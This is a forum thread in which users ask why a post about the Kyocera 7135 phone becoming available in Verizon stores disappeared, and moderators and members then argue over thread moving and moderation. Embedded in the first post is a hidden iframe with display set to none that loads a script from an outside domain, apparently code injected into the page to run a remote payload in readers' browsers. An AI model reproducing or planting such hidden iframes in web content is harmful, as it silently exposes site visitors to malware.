+ Reply to Thread

MODS: Why was "7135 becoming available in stores, they beg to differ" deleted?

I'm curious as to why, others were replying and joining the conversation about why the corp stores deny that they will get it and the email verizon sent out says over 1200 stores will carry effective 4/30/03...

I'd curious to find out here, why it was deleted. I know I'm new here, but it was a valid topic.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

It appears your thread was merged with the "release date: rumors/speculation" thread

Yeah, nothing sinister, they just try to keep the number of threads from getting too bloated. Would be nice if there was a way to find out where it went, though, without having to scrape through a bunch of threads. (Other than the search function--I knew what you'd say, Hotsync).
    ---------------
    The same thing we do every night, Pinky...

ok that's cool then, just was wondering who I'd cheesed off or something thanks, I'll check that thread out.

Lots of cool info here to read about while I wait for mine to be delivered Friday morning !

I say nothing

jeh
    In general these forums seem to be subject to, um, excess zeal on the part of the moderators. "I'm a moderator! I must DO something!" Most of the 7135-related threads moved recently from here to the "general discussion" forum should have been left here; they were perfect fits here and they are definitely not "everything else".

Resident Curmudgeon
    Excess zeal, like beauty, lies in the eye of the beholder. The moderators have to make some tough calls trying to keep things "on topic" and impose some kind of order. Without moderators, the board would slide quickly into chaos, much like USENET. While I don't agree with all of their calls, I still applaud their efforts in general.

It would be nice if the moderators would post a PM or an email when they moved a thread. Then at least we'd know where the heck the silly thing went!

-PatP

Administrator
    this was moved to General discussion because it was not specific to 7135.

jeh is a Little overreacting.. no noe here acts like that.

the thread was merged because it was still speaking on speculation/rumors...

Don't know that I call an email from verizon corporate saying it's been released "speaking on speculation"..

My VALID topic was that the email states it's available in corp. stores nationwide and a nice collection of stores in st. louis MO says "no we won't stock it". I was curious as to whether anyone else had gotten it in a store as of the 30th of April.

jeez.

Hey, get your heads out of your ....

We (the moderators/admins) take time out of our lifes to help out here. I tell you, I am sure we all have better things to do then to sit here moving threads around for nothing.

THis is all being done in an effort to make the board more user friendly to newbs.....so quit acting like one

jeh
    Needing to move many threads is generally a sign that the forum titles and descriptions need to be re-thought.

Perhaps the 7135 - general thread should be broken into two, one for purely technical issues and one for verizon/coverage/etc. issues.

In any case I still see NO reason for moving 7135-related threads out of the 7135 group and into here. And every reason for leaving them in that group.